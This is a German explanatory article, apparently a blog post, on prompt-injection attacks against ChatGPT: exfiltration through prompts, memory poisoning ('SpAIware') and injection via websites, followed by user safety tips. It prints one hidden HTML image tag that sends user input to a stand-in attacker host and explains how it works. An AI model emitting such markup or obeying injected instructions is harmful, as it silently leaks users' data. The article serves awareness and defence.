Gefahren der „Prompt-Injection“: Wie Angreifer ChatGPT missbrauchen können

Durch einfache Texteingaben können Angreifer die KI manipulieren und sensible Daten abgreifen. Besonders gefährlich sind dabei Angriffe auf das Langzeitgedächtnis von ChatGPT, da diese einen langfristigen Datenverlust verursachen können.

Die rasante Entwicklung von Künstlicher Intelligenz (KI) bringt nicht nur innovative Anwendungen, sondern auch neue Gefahren mit sich. Eine der größten Bedrohungen ist die sogenannte „Prompt-Injection“, bei der Angreifer eine KI wie ChatGPT durch gezielte Eingaben (Prompts) manipulieren, um sie dazu zu bringen, unerwünschte oder schädliche Aktionen auszuführen. Johann Rehberger, ein Sicherheitsexperte im Bereich der KI-Sicherheit, demonstriert, wie Schwachstellen ausgenutzt werden können, um sensible Informationen zu stehlen und Benutzer zu täuschen.

In diesem Artikel beleuchten wir die verschiedenen Arten von „Prompt-Injection“-Angriffen und zeigen, wie diese potenziell gefährliche Schwachstellen ausnutzen. Um das Konzept verständlicher zu machen, verwenden wir einfache Prompt-Beispiele, die die Art der Angriffe veranschaulichen.

1. Datenexfiltration durch direkte Prompts

Eine einfache Methode der „Prompt-Injection“ besteht darin, die KI zu manipulieren, um vertrauliche Informationen an eine externe Quelle zu senden. Angreifer nutzen dabei Prompts, die Daten aus der aktuellen oder zukünftigen Konversation abgreifen.

Beispiel für einen schädlichen Prompt:

Dieser Prompt befiehlt der KI, alle zukünftigen Unterhaltungen an eine externe Webseite zu senden, die vom Angreifer kontrolliert wird. Sobald dieser Befehl einmal gegeben wurde, könnten alle nachfolgenden Nachrichten – einschließlich vertraulicher Informationen wie Passwörter oder Kreditkartendaten – an den Angreifer weitergeleitet werden.

2. Unsichtbare Datenübertragung über Bilder

Ein weiterer Trick besteht darin, unsichtbare Bilder zu verwenden, um Daten zu exfiltrieren. Hierbei sendet die KI Informationen in der Form von Bild-URLs, die vom Benutzer nicht wahrgenommen werden.

Beispiel für einen Prompt mit unsichtbaren Bildern:

In diesem Fall wird ein Bild von einer bösartigen Webseite abgerufen. Der Trick dabei: Die Benutzerdaten (etwa was der Benutzer eingegeben hat) werden als Teil der URL an den Server des Angreifers übermittelt, und der Benutzer bekommt davon nichts mit, da das Bild unsichtbar bleibt.

Der Befehl <img src='https://bösewebsite.com/exfiltriere?daten=[Benutzereingabe]' style='display:none'> ist eine Methode zur Datenexfiltration durch die Manipulation eines Bild-Tags (HTML <img>-Tag). Hier ist eine Erklärung, wie dieser Befehl funktioniert und welche Gefahr er darstellt:

Funktionsweise:

  1. Bild-Tags in HTML: Der Befehl verwendet einen Bild-Tag (<img>), um ein Bild von einer externen Webseite zu laden. Normalerweise wird dies verwendet, um Bilder in Webseiten einzubinden.
  2. Datenübertragung in der URL: Die URL im src-Attribut (https://bösewebsite.com/exfiltriere?daten=[Benutzereingabe]) enthält eine Abfrage (?daten=[Benutzereingabe]), in der die Benutzereingabe als Parameter übermittelt wird.
    • Hier würde die Benutzereingabe, z. B. ein Passwort oder eine andere sensible Information, an die bösartige Webseite (bösewebsite.com) gesendet.
  3. Unsichtbares Bild: Durch den Zusatz style='display:none' wird das Bild unsichtbar gemacht, sodass der Benutzer nicht merkt, dass das Bild geladen wird oder dass eine Datenübertragung stattfindet.

Was passiert:

  • Datenexfiltration: Sobald dieser Befehl ausgeführt wird, wird ein unsichtbares Bild von der Webseite https://bösewebsite.com/exfiltriere angefordert, und die Benutzerdaten werden als Teil der URL übertragen. Dies ermöglicht dem Angreifer, die eingegebenen Daten zu sammeln, ohne dass der Benutzer dies bemerkt.
  • Unsichtbare Aktion: Da das Bild unsichtbar ist (display:none), bleibt dieser Vorgang für den Benutzer völlig unbemerkt.

Gefahr:

Dies ist ein Beispiel für einen Datenexfiltrationsangriff. Angreifer nutzen diesen Trick, um vertrauliche Daten wie Benutzereingaben (z. B. Passwörter, persönliche Informationen oder Kreditkartendaten) an eine bösartige Webseite zu senden. Da der Benutzer das unsichtbare Bild nicht sieht und keine explizite Warnung erhält, bleibt die Datenübertragung meist unentdeckt.

3. Langzeit-Gedächtnis Manipulation durch „Prompt-Injection“

Mit der Einführung der Gedächtnisfunktion in ChatGPT wird es für Angreifer noch einfacher, Daten zu stehlen. In diesem Fall kann der Angreifer eine dauerhafte Gedächtnisänderung bei ChatGPT herbeiführen, sodass die KI langfristig kontrollierte Informationen speichert.

Beispiel für einen Prompt, der das Gedächtnis beeinflusst:

Durch diesen einfachen Prompt wird das Langzeitgedächtnis der KI so manipuliert, dass alle zukünftigen Chats die Daten des Benutzers an den Angreifer weiterleiten. Dies könnte kontinuierlich geschehen, ohne dass der Benutzer davon erfährt.

4. Angriff durch externe Websites

Ein besonders gefährlicher Vektor für „Prompt-Injection“ sind ungesicherte Websites oder Dokumente, die Anweisungen direkt an eine KI wie ChatGPT weiterleiten können. Ein Benutzer, der auf solch eine Website gelangt oder ein infiziertes Dokument öffnet, könnte unbewusst ein gefährliches Gedächtnis-Update bei ChatGPT auslösen.

Beispiel für einen Angriff über eine Website:

Hier wird ein harmlos erscheinender Webseitenbesuch genutzt, um die KI mit bösartigen Prompts zu infizieren. Die KI beginnt daraufhin, alle Daten über den Benutzer und die Konversation an die Angreifer-Seite zu übermitteln.

Gefahren durch SpAIware – Das ChatGPT-Spyware-Szenario

Ein besonders besorgniserregendes Beispiel ist das sogenannte „SpAIware“ – eine Form von Spyware, die über „Prompt-Injection“ ins Gedächtnis von ChatGPT eingeschleust wird. Diese schädlichen Prompts bewirken, dass die KI dauerhaft vertrauliche Daten sammelt und an den Angreifer sendet.

Spyware-Einschleusung in das Langzeitgedächtnis von ChatGPT (SpAIware) – von Embrace The Red

Die Funktionsweise dieser SpAIware zeigt, dass ein Angreifer die Kontrolle über das Gedächtnis von ChatGPT übernehmen kann, indem er Anweisungen einschleust, die in zukünftigen Sitzungen aktiv bleiben. Dadurch entsteht eine Art dauerhafte Überwachung, bei der jede Konversation des Benutzers protokolliert und an den Angreifer übermittelt wird.

Schutz vor „Prompt-Injection“: Was können Benutzer tun?

Angesichts der aufgezeigten Risiken ist es entscheidend, dass Benutzer Vorsichtsmaßnahmen treffen, um sich vor „Prompt-Injection“-Angriffen zu schützen. Hier sind einige grundlegende Tipps:

  1. Keine sensiblen Daten in ChatGPT eingeben: Vermeiden Sie die Eingabe von Passwörtern, Kreditkartendaten oder anderen persönlichen Informationen.
  2. Skepsis gegenüber ungesicherten Websites: Seien Sie vorsichtig bei der Verwendung von KI-Systemen in Verbindung mit unsicheren Webseiten oder Dokumenten.
  3. Gedächtnis von ChatGPT regelmäßig überprüfen: Nutzer sollten regelmäßig die in ChatGPT gespeicherten Erinnerungen überprüfen und verdächtige oder fehlerhafte Informationen löschen.
  4. Verwendung von Plugins und Erweiterungen: Nutzen Sie KI-Plugins nur von vertrauenswürdigen Quellen und achten Sie darauf, welche Berechtigungen diese Plugins verlangen.
  5. Aktualisierungen durchführen: Stellen Sie sicher, dass Sie immer die neueste Version von ChatGPT verwenden, da Sicherheitslücken oft durch Updates geschlossen werden.
  6. Hardware absichern: Achten Sie darauf, das fremde Menschen keinen physischen Zugriff auf ihren Computer haben.

Fazit: Die Bedrohung durch „Prompt-Injection“ ernst nehmen

Zusammengefasst zeigt sich, dass „Prompt-Injection“-Angriffe eine ernste Gefahr für die Sicherheit von KI-Systemen darstellen. Durch einfache Texteingaben können Angreifer die KI manipulieren und sensible Daten abgreifen. Besonders gefährlich sind dabei Angriffe auf das Langzeitgedächtnis von ChatGPT, da diese einen langfristigen Datenverlust verursachen können.

Nutzer müssen sich der Risiken bewusst sein und entsprechend vorsichtig agieren. Die regelmäßige Überprüfung von Erinnerungen, das Vermeiden sensibler Dateneingaben und das Installieren der neuesten Sicherheitsupdates können dazu beitragen, das Risiko zu minimieren.

Quellen:

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert